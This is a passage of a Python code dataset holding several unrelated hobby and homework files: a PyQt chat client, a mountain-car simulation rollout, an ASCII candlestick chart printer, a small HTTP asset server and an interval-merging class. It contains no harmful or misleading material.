self.outproj_lin2(h)\n return z[seq.invert_permutation(sorted_indices)]\n","repo_name":"dschulman/pslicn","sub_path":"pslicn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
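The `Classify.forward` method in the pslicn record above uses a standard PyTorch recipe for batching variable-length sequences: pad them, sort the batch by length, run the length-aware model, then invert the sort so results line up with the caller's order. A minimal, self-contained sketch of that recipe; `invert_permutation` here is a hypothetical stand-in for the record's `seq.invert_permutation`, whose source is not shown:

```python
import torch
import torch.nn.utils.rnn as tnur

def invert_permutation(p: torch.Tensor) -> torch.Tensor:
    # hypothetical stand-in for seq.invert_permutation used in the record
    inv = torch.empty_like(p)
    inv[p] = torch.arange(p.numel())
    return inv

xs = [torch.randn(t, 8) for t in (5, 12, 3)]   # variable-length (T_i, F) inputs
N = torch.tensor([x.shape[0] for x in xs], dtype=torch.int)
x = tnur.pad_sequence(xs, batch_first=True).transpose(1, 2)  # (B, F, T_max)
N, order = torch.sort(N)                        # shortest sequences first
x = x[order]
# a length-aware model would consume (x, N) here; a mean stands in for it
z = x.mean(dim=(1, 2))
z = z[invert_permutation(order)]                # restore the caller's ordering
print(z.shape)  # torch.Size([3])
```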
+{"seq_id":"12318308692","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä lukuja siihen saakka,\n# kunnes tämä syöttää tyhjän merkkijonon lopetusmerkiksi.\n# Lopuksi ohjelma tulostaa saaduista luvuista pienimmän ja suurimman.\n\nUI = input(\"Anna luku. Ohjelma loppuu, kun annat tyhjän merkkijonon: \")\nlowest_num = 0\nhighest_num = 0\nindex = 0\n\nwhile UI != \"\":\n\n number = int(UI)\n if lowest_num == 0:\n if index == 0:\n lowest_num = number\n\n if highest_num == 0:\n highest_num = number\n\n if number < lowest_num:\n lowest_num = number\n\n if number > highest_num:\n highest_num = number\n\n index += 1\n\n UI = input('Anna luku. Ohjelma loppuu, kun annat tyhjän merkkijonon: ')\n\nprint('Pienin syötetty luku: ' + str(lowest_num))\nprint('Suurin syötetty luku: ' + str(highest_num))","repo_name":"naigelt/Python-Homework","sub_path":"Moduuli 4 Tehtävät/Teht_4.3.py","file_name":"Teht_4.3.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37191162434","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\nfrom SocketClient import SocketClient\nimport threading\n\n#UI파일 연결\n#단, UI파일은 Python 코드 파일과 같은 디렉토리에 위치해야한다.\nform_class = uic.loadUiType(\"client.ui\")[0]\n\n#화면을 띄우는데 사용되는 Class 선언\nclass WindowClass(QMainWindow, form_class) :\n def __init__(self) :\n super().__init__()\n self.setupUi(self) \n\n self.clientSocket = SocketClient() #Socket client 객체 생성\n\n self.sendBtn.clicked.connect(self.SendBtnEvent) # send button에 대한 event 등록\n self.connectBtn.clicked.connect(self.ConnectBtnEvent) # connect button에 대한 event 등록\n self.disconnectBtn.clicked.connect(self.DisconnectBtnEvent) # disconnect button에 대한 event 등록\n self.menuexit.triggered.connect(self.AppExit) # 상단 menu bar의 exit에 대한 event 등록\n\n self.clientSocket.RegRxCallbackFunc(self.RxMessageProcess) # 메시지 수신시 호출할 함수를 등록\n\n #상단 menu bar의 exit에 대한 구현 부\n def AppExit(self) :\n self.clientSocket.SocketClose()\n self.close()\n\n #Send 버튼에 대한 구현 부\n def SendBtnEvent(self) :\n print(\"send\")\n #self.view.append(self.inputTxt.toPlainText())\n self.clientSocket.SocketSend(self.inputTxt.toPlainText())\n self.inputTxt.clear()\n \n #Connect 버튼에 대한 구현 부\n def ConnectBtnEvent(self) :\n print(\"connect\")\n \n addr = self.inputServerAddr.toPlainText()\n port = int(self.inputPort.toPlainText())\n if (len(addr) > 0) and (port > 0) : \n print(\"Try to connect to [addr : {}] [port : {}]\".format(addr, port))\n self.clientSocket.SocketOpen(addr, port)\n else :\n print(\"Check server address and port\")\n \n #disconnect 버튼에 대한 구현 부\n def DisconnectBtnEvent(self) :\n print(\"disconnect\")\n self.clientSocket.SocketClose()\n\n #메시지 수신시 화면 출력\n def RxMessageProcess(self, data) :\n print('Rx Message : {}'.format(data))\n self.view.append(data)\n \nif __name__ == \"__main__\" :\n #QApplication : 프로그램을 실행시켜주는 클래스\n app = QApplication(sys.argv) \n\n #WindowClass의 인스턴스 생성\n myWindow = WindowClass() \n\n #프로그램 화면을 보여주는 코드\n myWindow.show()\n \n #프로그램을 이벤트루프로 진입시키는(프로그램을 작동시키는) 코드\n app.exec_() ","repo_name":"curious1123/SimpleMessager","sub_path":"SocketClient/StartClient.py","file_name":"StartClient.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34818399512","text":"from utils import load_checkpoint\nimport numpy as np\nimport gym\nimport custom_gym\n\nfrom gym import wrappers\nimport torch\nfrom pynput import keyboard\nfrom time import sleep\n\n\nclass Listener:\n\n def __init__(self, a):\n self.action = a\n self.lis = keyboard.Listener(on_press=self.on_press)\n self.lis.start()\n # self.lis.join()\n\n def on_press(self, key):\n try:\n k = key.char # single-char keys\n except:\n k = key.name # other keys\n if key == keyboard.Key.esc: return False # stop listener\n\n if k == 'left':\n # Push left\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[0] = 1\n # print(self.action)\n if k == 'down':\n # no push\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[1] = 1\n # print(self.action)\n if k == 'right':\n # push right\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[2] = 1\n # print(self.action)\n\n\nrng = np.random.RandomState(23456)\nsave_path = './models/mountaincar_3D'\n\naction_sequence = np.load('./action_sequence2.npz')['arr_0']\n# action_sequence = np.reshape(action_sequence,(1001,3))\n\natt, cluster = load_checkpoint(save_path, 8)\n\nmin_position = -1.2\nmax_position = 0.6\nmax_speed = 0.07\n\natt = att.cpu()\nfor c in range(len(cluster)):\n cluster[c].cpu()\n\n\nenv = gym.make('mcEnv-v0')\n# env = gym.wrappers.Monitor(env, './video', force=True)\nstart_obs = env.reset()\n\nstart_action = np.zeros(3)\nstart_action[env.action_space.sample()] = 1\naction = np.zeros(3)\naction[1] = 1\n\nactions = []\n\n# for i in action_sequence:\n# actions += [np.argmax(i)]\n# action = action_sequence[0]\n\nlistener = Listener(action)\n\nX = torch.tensor([np.append(start_obs, start_action)], dtype=torch.float)\nX[:, 0] = (X[:, 0] - min_position) / (max_position - min_position)\nX[:, 1] = (X[:, 1] + max_speed) / (max_speed + max_speed)\n\n\nY_pred_all = cluster.forward(X)\nattention = att.forward(X)\n\nY_pred_att_argmax = Y_pred_all[torch.argmax(attention)]\nY_pred_att_argmax = Y_pred_att_argmax.detach().numpy().flatten()\n\n# denormalization\nY_pred_att_argmax[0] = (Y_pred_att_argmax[0]) * (max_position - min_position) + min_position\nY_pred_att_argmax[1] = (Y_pred_att_argmax[1]) * (max_speed + max_speed) - max_speed\n# clipping\nY_pred_att_argmax[0] = np.clip(Y_pred_att_argmax[0], min_position, max_position)\nY_pred_att_argmax[1] = np.clip(Y_pred_att_argmax[1], -max_speed, max_speed)\naction_list = action\nobs_real, _, _, _ = env.step(np.argmax(start_action))\nrecorded_actions = np.empty((0, 3))\n\nfor i in range(4001):\n\n \"\"\" Comment this to use hotkeys for controlling the car\"\"\"\n\n action = action_sequence[i]\n # AUTOREGRESSIVE\n X = torch.tensor([np.append(Y_pred_att_argmax, action)], dtype=torch.float)\n # normalization\n X[:, 0] = (X[:, 0] - min_position) / (max_position - min_position)\n X[:, 1] = (X[:, 1] + max_speed) / (max_speed + max_speed)\n Y_pred_all = cluster.forward(X)\n\n attention = att.forward(X)\n # print(torch.argmax(attention))\n Y_pred_att_argmax = Y_pred_all[torch.argmax(attention)]\n Y_pred_att_argmax = Y_pred_att_argmax.detach().numpy().flatten()\n Y_pred_att_argmax[0] = Y_pred_att_argmax[0] * (max_position - min_position) + min_position\n Y_pred_att_argmax[1] = Y_pred_att_argmax[1] * (max_speed + max_speed) - max_speed\n\n Y_pred_att_argmax[0] = np.clip(Y_pred_att_argmax[0], min_position, max_position)\n Y_pred_att_argmax[1] = np.clip(Y_pred_att_argmax[1], -max_speed, max_speed)\n\n # env.set_state(Y_pred_att_argmax)\n env.step(np.argmax(action))\n\n 
env.render()\n # recorded_actions = np.append(recorded_actions, [action], axis=0)\n\n\n# np.savez('action_sequence2.npz', recorded_actions)\nenv.close()\n","repo_name":"NicoBach/distributed-dynamics-model","sub_path":"run_mountaincar.py","file_name":"run_mountaincar.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
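The rollout above keeps normalizing the predicted state into [0, 1] before the network and denormalizing plus clipping afterwards. A small self-contained round-trip check of those transforms, using the same bounds the script hard-codes:

```python
import numpy as np

min_position, max_position, max_speed = -1.2, 0.6, 0.07  # bounds from the script

def normalize(obs):
    pos = (obs[0] - min_position) / (max_position - min_position)
    vel = (obs[1] + max_speed) / (2 * max_speed)
    return np.array([pos, vel])

def denormalize(obs):
    pos = obs[0] * (max_position - min_position) + min_position
    vel = obs[1] * 2 * max_speed - max_speed
    # clip exactly as the rollout does before feeding the state back in
    return np.array([np.clip(pos, min_position, max_position),
                     np.clip(vel, -max_speed, max_speed)])

print(denormalize(normalize(np.array([-0.5, 0.01]))))  # ~[-0.5, 0.01]
```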
+{"seq_id":"17823651938","text":"# -*- coding: utf-8 -*-\n\n\n#from copy import deepcopy\nfrom datetime import(\n datetime\n)\nimport math\n\n# config\nmin_chart_width = 10\nmin_chart_height = 10\nchart_width = 50\nchart_height = 20\nchart_bg = '.'\nlabel_bg = '░' #█\ncandle_default = '░' # '─'\ncandle_bg = '|'\ncandle_open = '┤'\ncandle_high = '|'\ncandle_low = '|'\ncandle_close = '├'\ncandle_open_close = '┼'\nborder_top = '-'\nborder_sides = '|'\ndraw_border = False\n\n\ndef show(ts_unsorted):\n \"\"\"\n time series (ts) formats\n 1-datum [ [dt, int], ]\n OHLC [ [dt, [int, int, int, int] ]\n 1. sort time series by date\n 2. determine date span per ascii column (end-start)/(num cols)\n 3. for each col, avg points in that span --> this is price for that col\n NOTE: \n for open, do first\n for high, do max\n for low, do min \n for close, do last\n for mid, do avg\n determine y range from column data, not source points\n if no data in a span --> copy left col\n \"\"\"\n # validation\n if len(ts_unsorted) < 1:\n print('empty time series')\n #elif len(ts_unsorted) < chart_width:\n # print('insufficient ticks ({}) for chart width of ({})'.format(len(ts_unsorted), chart_width))\n # determine format of time series\n elif len( ts_unsorted[0][1] ) == 1:\n print ('SINGLE')\n show_single(ts_unsorted)\n elif len( ts_unsorted[0][1] ) == 4:\n print ('OHLC')\n show_ohlc(ts_unsorted)\n else:\n print ('UNKNOWN')\n\n \ndef show_single(ts_unsorted):\n # sort\n ts = sorted(ts_unsorted, key=lambda p: p[0])\n # range\n start = None\n end = None\n y_min = None\n y_max = None\n for p in ts:\n if start is None or p[0] < start: start = p[0]\n if end is None or p[0] > end: end = p[0]\n if y_min is None or p[1][0] < y_min: y_min = p[1][0]\n if y_max is None or p[1][0] > y_max: y_max = p[1][0]\n # validation\n assert start==ts[0][0], end==ts[len(ts)-1][0]\n # plot\n col_i = 0 # current ascii chart column index\n col_span = (end-start)/chart_width\n chart = []\n avg = float(0)\n num_vals_in_avg = 0\n for point in ts:\n avg += point[1][0]\n num_vals_in_avg += 1\n # compare cur date to next threshold\n if point[0] > ts[0][0] + ((col_i+1) * col_span):\n # filled one ascii col; append to chart\n avg /= num_vals_in_avg\n candle = [chart_bg]*chart_height \n if avg == y_min:\n row_i = int(0); \n elif avg == y_max:\n row_i = int(chart_height - 1)\n else:\n row_i = float( (avg - y_min) / (y_max - y_min) ) # percent: 0 to 100\n row_i *= chart_height # scale: 0 to chart_height\n row_i = int(row_i)\n candle[row_i] = candle_default\n chart.append(candle)\n avg = point[1][0]\n num_vals_in_avg = 1\n col_i += 1\n #print\n for y in range(len(chart[0])-1, -1, -1):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n print()\n return\n\n # y axis labels - one candle at the left\n y_labels = [label_bg]*chart_height\n y_labels[0] = str(max_price) + label_bg\n y_labels[chart_height-1] = str(min_price) + label_bg\n y_labels_width = max( len(y_labels[0]), len(y_labels[chart_height-1]) )\n y_labels_width = min(y_labels_width, 10) # hard-coded max\n for z in range(0, chart_height): # justify labels\n y_labels[z] = y_labels[z].ljust(y_labels_width)\n y_labels[z] = y_labels[z][:y_labels_width-1] # trim\n y_labels[z] += label_bg\n chart = [y_labels] + chart # append to left of chart\n\n # print main chart\n for y in range(0, len(chart[0])):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n # x axis labels - make one row for each label,\n x_labels = []\n\n total_width = y_labels_width + len(chart)\n\n 
row = [label_bg]*y_labels_width + list(str(start))\n while len(row) < total_width - 1: row += label_bg\n x_labels.append(row[:total_width-1])\n\n row = str(end).rjust( total_width-1 )\n x_labels.append( row )\n\n for row in range(0, len(x_labels)):\n for col in range(0, len(x_labels[0])):\n print( x_labels[row][col], end='')\n print()\n \"\"\"\n y axis = min price to max\n x axis = first time to last\n divide prices into chunks\n average price of each chunk\n list of candles (horizontal)\n from each candle, make a vertical list of chars\n for each row of candle:\n for each candle:\n print one char\n line break carriage return\n \"\"\"\n\n\n\ndef show_ohlc(ts_unsorted):\n \"\"\"\n OHLC [ [dt, [int, int, int, int] ]\n \"\"\"\n # sort\n ts = sorted(ts_unsorted, key=lambda p: p[0])\n # spans\n start = ts[0][0]\n end = ts[len(ts)-1][0]\n y_max = ts[0][1][1] # initialize to first high\n y_min = ts[0][1][2] # initialize to first low\n for p in ts:\n y_max = max( p[1][1], y_max ) # max high\n y_min = min( p[1][2], y_min ) # min low\n # plot\n col_i = 0 # current ascii chart column index\n col_span = (end-start)/chart_width\n chart = []\n first_open = None\n highest = None\n lowest = None\n for tick in ts:\n if not first_open: first_open = tick[1][0]\n if highest: highest = max(highest, tick[1][1])\n else: highest = tick[1][1]\n if lowest: lowest = min(lowest, tick[1][2])\n else: lowest = tick[1][2]\n final_close = tick[1][3] # final within candle\n # compare cur date to next threshold\n if tick[0] > ts[0][0] + ((col_i+1) * col_span):\n\n # calculate row index for each of OHLC:\n # open\n if first_open: \n if first_open == y_min: open_i = int(0); \n elif first_open == y_max: open_i = int(chart_height - 1)\n else:\n open_i = float( (first_open - y_min) / (y_max - y_min) ) # percent: 0 to 100\n open_i *= chart_height # scale: 0 to chart_height\n open_i = int(open_i) # floor\n # high\n if highest == y_min: high_i = int(0)\n elif highest == y_max: high_i = int(chart_height - 1)\n else:\n high_i = float( (highest - y_min) / (y_max - y_min) ) # percent: 0 to 100\n high_i *= chart_height # scale: 0 to chart_height\n high_i = int(high_i) # floor\n # low\n if lowest == y_min: low_i = int(0)\n elif lowest == y_max: low_i = int(chart_height - 1)\n else:\n low_i = float( (lowest - y_min) / (y_max - y_min) ) # percent: 0 to 100\n low_i *= chart_height # scale: 0 to chart_height\n low_i = int(low_i) # floor\n # close\n if final_close == y_min: close_i = int(0); \n elif final_close == y_max: close_i = int(chart_height - 1)\n else:\n close_i = float( (final_close - y_min) / (y_max - y_min) ) # percent: 0 to 100\n close_i *= chart_height # scale: 0 to chart_height\n close_i = int(close_i) # floor\n # draw candle\n candle = [chart_bg]*chart_height \n for row_i in range(low_i, high_i+1):\n candle[row_i] = candle_bg\n candle[high_i] = candle_high\n candle[low_i] = candle_low\n if open_i == close_i:\n candle[open_i] = candle_open_close\n else:\n candle[open_i] = candle_open\n candle[close_i] = candle_close\n # add to chart\n chart.append(candle)\n # increment + continue\n col_i += 1\n first_open = False\n highest = None\n lowest = None\n\n # y axis labels - one candle at the left\n y_labels = [label_bg]*chart_height\n y_labels[0] = str(y_min) + label_bg\n y_labels[chart_height-1] = str(y_max) + label_bg\n y_labels_width = max( len(y_labels[0]), len(y_labels[chart_height-1]) ) # get widest label\n y_labels_width = min(y_labels_width, 10) # width threshold\n for z in range(0, chart_height): # justify labels\n y_labels[z] 
= y_labels[z].ljust(y_labels_width, label_bg)\n y_labels[z] = y_labels[z][:y_labels_width-1] # trim\n y_labels[z] += label_bg\n chart = [y_labels] + chart # append to left of chart\n\n # print main chart\n for y in range( len(chart[0])-1, -1, -1 ):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n\n # x axis labels - make one row for each label,\n x_labels = []\n\n total_width = y_labels_width + len(chart)\n # starting timestamp\n row = [label_bg]*y_labels_width + list(str(start))\n while len(row) < total_width - 1: row += label_bg\n x_labels.append(row[:total_width-1])\n # ending timestamp\n row = str(end).rjust( total_width-1, label_bg )\n x_labels.append( row )\n\n for row in range(0, len(x_labels)):\n for col in range(0, len(x_labels[0])):\n print( x_labels[row][col], end='')\n print()\n \"\"\"\n y axis = min price to max\n x axis = first time to last\n divide prices into chunks\n average price of each chunk\n list of candles (horizontal)\n from each candle, make a vertical list of chars\n for each row of candle:\n for each candle:\n print one char\n line break carriage return\n \"\"\"\n","repo_name":"paperduck/cli_chart","sub_path":"cli_chart.py","file_name":"cli_chart.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
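The docstring in the cli_chart record describes the core idea: split the full time span into `chart_width` equal slices and average the values that land in each slice, one slice per ASCII column. A compact standalone illustration of that binning step (names here are mine, not the record's):

```python
from datetime import datetime, timedelta

def bin_series(ts, width):
    """Average (time, value) pairs into `width` equal time slices."""
    ts = sorted(ts, key=lambda p: p[0])
    start, end = ts[0][0], ts[-1][0]
    span = (end - start) / width            # time covered by one column
    cols = [[] for _ in range(width)]
    for when, value in ts:
        i = min(int((when - start) / span), width - 1) if span else 0
        cols[i].append(value)
    return [sum(c) / len(c) if c else None for c in cols]

base = datetime(2022, 1, 1)
series = [(base + timedelta(hours=h), float(h % 7)) for h in range(100)]
print(bin_series(series, 10))
```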
+{"seq_id":"29029799199","text":"#!/usr/bin/python3\n\nimport string,cgi,time\nimport argparse\nimport json\nimport inspect\nimport base64\nimport datetime\nimport calendar\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom os import curdir, sep, listdir\nfrom os.path import isfile, join, dirname\nimport os\n\nASSET_BUNDLE_FOLDER = \"Assets/AssetBundles\"\nTHUMBNAIL_FOLDER\t= \"Assets/Thumbnails\"\nSCENE_FOLDER\t\t= \"Assets/SceneSaves\"\nSCENE_SAVE_EXT\t\t= \"scsav\"\n\nSERVER_ADDR\t\t\t= \"\"\n\ndef GetAssetListing():\n\tassetBundles = [f for f in listdir(ASSET_BUNDLE_FOLDER) if isfile(join(ASSET_BUNDLE_FOLDER, f))]\n\toutput = []\n\n\tfor bundle in assetBundles:\n\t\tif bundle.startswith(\"AssetBundles\"):\n\t\t\tcontinue\n\n\t\tif not bundle.endswith(\".manifest\") and not bundle.endswith(\".meta\"):\n\t\t\t# Check if a Thumbnail exists\n\t\t\tthumbURI = THUMBNAIL_FOLDER + \"/\" + bundle + \".png\"\n\n\t\t\titem = {\"BundleName\": bundle}\n\n\t\t\tif os.path.isfile(thumbURI):\n\t\t\t\twith open(thumbURI, \"rb\") as thumb:\n\t\t\t\t\titem[\"Thumbnail\"] = base64.b64encode(thumb.read()).decode(\"ascii\")\n\n\t\t\toutput.append(item)\n\n\t\t\t'''\n\t\t\t# Find out which assets are contained in the current bundle\n\t\t\tassets = []\n\t\t\twith open(ASSET_BUNDLE_FOLDER+\"/\"+bundle+\".manifest\", encoding=\"utf-8\") as manifest:\n\t\t\t\tassetListReached = False\n\t\t\t\tfor line in manifest:\n\t\t\t\t\tif line.startswith(\"Assets:\"):\n\t\t\t\t\t\tassetListReached = True\n\t\t\t\t\telif assetListReached:\n\t\t\t\t\t\tif line.startswith(\"- \"):\n\t\t\t\t\t\t\tassets.append(line[2:].strip())\n\t\t\toutput.append({\"BundleName\": bundle, \"Assets\": assets})\n\t\t\t'''\n\t\t\t\n\treturn output\n\ndef GetSceneListing():\n\tscenes = [f for f in listdir(SCENE_FOLDER) if isfile(join(SCENE_FOLDER, f))]\n\toutput = []\n\n\tfor scene in scenes:\n\n\t\tif not scene.endswith(\".manifest\") and not scene.endswith(\".meta\"):\n\t\t\toutput.append({\"LastModified\": os.path.getmtime(SCENE_FOLDER + \"/\" + scene), \"Name\": scene[:-6]})\n\n\treturn output\n\nclass MyHandler(BaseHTTPRequestHandler):\n\n\tdef do_GET(self):\n\t\tpaths = self.path[1:].split('/')\n\t\tGET_ROOT = paths[0]\n\n\t\tif self.path == \"/\":\n\t\t\tmethods = inspect.getmembers(self, predicate=inspect.ismethod)\n\t\t\tpossibleMethods = {}\n\n\t\t\t# Get all HTTP-METHODs in this class (e.g. 
GET, PUT, DELETE etc.)\n\t\t\tfor meth in methods:\n\t\t\t\tif meth[0].startswith(\"do_\"):\n\t\t\t\t\thttpMethod = meth[0][3:]\n\t\t\t\t\tpossibleMethods[httpMethod] = []\n\t\t\t\t\t# Now cycle through all the methods again and see if we have servlets\n\t\t\t\t\tfor servlet in methods:\n\t\t\t\t\t\tif servlet[0].startswith(httpMethod.lower() + \"_\"):\n\t\t\t\t\t\t\tpossibleMethods[httpMethod].append(servlet[0][servlet[0].index(\"_\")+1:])\n\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"Server-Methods\": possibleMethods}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\n\t\telse:\n\t\t\trequest = \"get_\" + GET_ROOT\n\t\t\tif hasattr(self, request):\n\t\t\t\tmethod = getattr(self, request)\n\t\t\t\tif inspect.ismethod(method):\n\t\t\t\t\tmethod(\"\".join(paths[1:]))\n\t\t\telse:\n\t\t\t\tself.send_error(501,\"%s-Module not implemented\" % GET_ROOT)\n\t\treturn\n\n\tdef do_PUT(self):\n\t\tpaths = self.path[1:].split('/')\n\t\tPUT_ROOT = paths[0]\n\n\t\tif self.path.endswith('/'):\n\t\t\tself.send_response(405, \"Method Not Allowed\")\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(\"PUT not allowed on a directory\\n\".encode())\n\t\t\tself.wfile.flush()\n\t\telif PUT_ROOT == \"\":\n\t\t\tself.send_response(405, \"Method Not Allowed\")\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(\"PUT not allowed on directory root\\n\".encode())\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\trequest = \"put_\" + PUT_ROOT\n\t\t\tif hasattr(self, request):\n\t\t\t\tmethod = getattr(self, request)\n\t\t\t\tif inspect.ismethod(method):\n\t\t\t\t\tmethod(\"\".join(paths[1:]))\n\t\t\telse:\n\t\t\t\tself.send_error(501,\"%s-Module not implemented\" % PUT_ROOT)\n\n\tdef get_Bundle(self, path):\n\t\tif path == \"\":\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"AssetBundleList\": GetAssetListing()}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\ttry:\n\t\t\t\tf = open(ASSET_BUNDLE_FOLDER + \"/\" + path, 'rb')\n\n\t\t\t\tself.send_response(200)\n\t\t\t\tself.send_header('Content-type', 'application/octet-stream')\n\t\t\t\tself.end_headers()\n\n\t\t\t\tself.wfile.write(f.read())\n\t\t\t\tf.close()\n\n\t\t\t\tself.wfile.flush()\n\t\t\texcept IOError:\n\t\t\t\tself.send_error(404,'File Not Found: %s' % path)\n\t\treturn\n\n\tdef get_Scene(self, path):\n\t\tif path == \"\":\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"SceneList\": GetSceneListing()}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\ttry:\n\t\t\t\tf = open(SCENE_FOLDER + \"/\" + path + \".\" + SCENE_SAVE_EXT, 'rb')\n\n\t\t\t\tself.send_response(200)\n\t\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\t\tself.end_headers()\n\n\t\t\t\tself.wfile.write(f.read())\n\t\t\t\tf.close()\n\n\t\t\t\tself.wfile.flush()\n\t\t\texcept IOError:\n\t\t\t\tself.send_error(404,'File Not Found: %s' % path)\n\t\treturn\n\n\tdef put_Scene(self, path):\n\t\tglobal SERVER_ADDR\n\n\t\ttry:\n\t\t\tos.makedirs(SCENE_FOLDER)\n\t\texcept FileExistsError: pass\n\n\t\tlength = int(self.headers['Content-Length'])\n\t\t\t\n\t\twith open(SCENE_FOLDER + \"/\" + path + \".\" + SCENE_SAVE_EXT, 'wb') as f:\n\t\t\tf.write(self.rfile.read(length))\n\t\t\t\n\t\tnow = 
datetime.datetime.now()\n\n\t\tprint(\"%s - - [%d/%s/%d %02d:%02d:%02d] \\\"PUT %s with %d bytes\\\"\" % (\n\t\t\tSERVER_ADDR, now.day, calendar.month_abbr[now.month], now.year, now.hour, now.minute, now.second, path, length\n\t\t))\n\t\t\n\t\tself.send_response(201, \"Created\")\n\t\tself.end_headers()\n\n\t\treturn\n\ndef main():\n\tglobal SERVER_ADDR\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--bind\", help=\"Set the IP from which the server waits for incoming requests\")\n\targs = parser.parse_args()\n\t\n\tif args.bind:\n\t\tSERVER_ADDR = args.bind\n\telse:\n\t\tSERVER_ADDR = \"127.0.0.1\"\n\t\tprint( \"Warning! You didn't specify an IP to bind the HTTP-Server on.\" )\n\t\tprint( \"This could potentially lead to an unreachable Server, if localhost isn't mapped to the preferred IPv4-Address.\" )\n\t\tprint( \"The bound IP-Address is in most cases the same address which gets queried for Assets.\\n\" )\n\t\n\ttry:\n\t\thttpd = HTTPServer((SERVER_ADDR, 80), MyHandler)\n\t\tprint('AssetServer started on %s. Serving...' % (SERVER_ADDR))\n\t\thttpd.serve_forever()\n\t\t\n\texcept KeyboardInterrupt:\n\t\tprint ('^C received, shutting down server')\n\t\thttpd.socket.close()\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"tbienias/AURA","sub_path":"UnityProject/AssetServer.py","file_name":"AssetServer.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
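`MyHandler` above routes requests by reflection: `do_GET` turns the first path segment into a method name like `get_Bundle` and calls it via `getattr`, falling back to a 501. The same servlet-style dispatch, stripped out of `BaseHTTPRequestHandler` as a runnable sketch:

```python
class Router:
    """Servlet-style dispatch: 'GET /Bundle/x' is routed to get_Bundle('x')."""

    def get_Bundle(self, path):
        return "bundle listing for %r" % path

    def dispatch(self, http_method, url_path):
        root, _, rest = url_path.strip("/").partition("/")
        handler = getattr(self, "%s_%s" % (http_method.lower(), root), None)
        if callable(handler):
            return handler(rest)
        return "501 %s-Module not implemented" % root

r = Router()
print(r.dispatch("GET", "/Bundle/level1.bundle"))  # routed to get_Bundle
print(r.dispatch("PUT", "/Scene/town"))            # no put_Scene here -> 501
```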
+{"seq_id":"13699117976","text":"import math\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(math.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(n / i)\n for divisor in reversed(large_divisors):\n yield divisor\n\nm=int(input())\nn=int(input())\narray=[]\nfor i in range(m):\n hello=list(map(int,input().split()))\n array.append(hello)\nif m==2 and n==2:\n res=array[0][0]\n find=list(divisorGenerator(res))\n for k in range(len(find)):\n if find[k]>m and find[k]>n:\n find.remove(find[k])\n value='11'\n value='01'\n \n \n","repo_name":"hamza-yusuff/CP-algo","sub_path":"jj lie.py","file_name":"jj lie.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"75358402542","text":"class NotAnIntervalExceptions(Exception):\n\t#print \"NotAnInterval\"\n\tpass\nclass IllegalIntervalException(Exception):\n\t#print \"IllegalInterval\"\n\tpass\nclass NoOverLapException(Exception):\n\tpass\n\nclass Interval:\n\tdef __init__(self, s):\n\t\tlbrack, middle, rbrack = s[0], s[1:-1], s[-1]\n\t\ttry:\n\t\t\tlower,upper = middle.split(',')\n\t\t\tassert(lbrack in [\"[\", \"(\"])\n\t\t\tassert(rbrack in [\"]\", \")\"])\n\t\t\tself.lower = int(lower)\n\t\t\tself.upper = int(upper)\n\t\texcept:\n\t\t\traise NotAnIntervalExceptions(s + \" not an interval!\")\n\t\tself.linclusive = (lbrack == \"[\")\n\t\tself.rinclusive = (rbrack == \"]\")\t\t\n\t\n\t\tif self.real_lower() > self.real_upper():\n\t\t\traise IllegalIntervalException(s + \" illegal interval!\")\n\t\t\t\n\tdef real_upper(self):\n\t\treturn self.upper if self.rinclusive else self.upper - 1\n\tdef real_lower(self):\n\t\treturn self.lower if self.linclusive else self.lower + 1\n\tdef __repr__(self):\n\t\treturn self.linclusive*'[' + (not self.linclusive)*'('+\\\n\t\tstr(self.lower)+','+str(self.upper)+self.rinclusive*']'+\\\n\t\t (not self.rinclusive)*')'\n\t\n\tdef __eq__(self, other):\n\t\tif isinstance(other, self.__class__):\n\t\t\treturn self.__dict__ == other.__dict__\n\t\telse:\n\t\t\treturn False\n\n\t\ndef merge_intervals(x,y):\n\tif x.real_upper() < y.real_lower()-1 or x.real_lower() > y.real_upper()+1:\n\t\traise NoOverLapException(str(x) + str(y) + \" do not 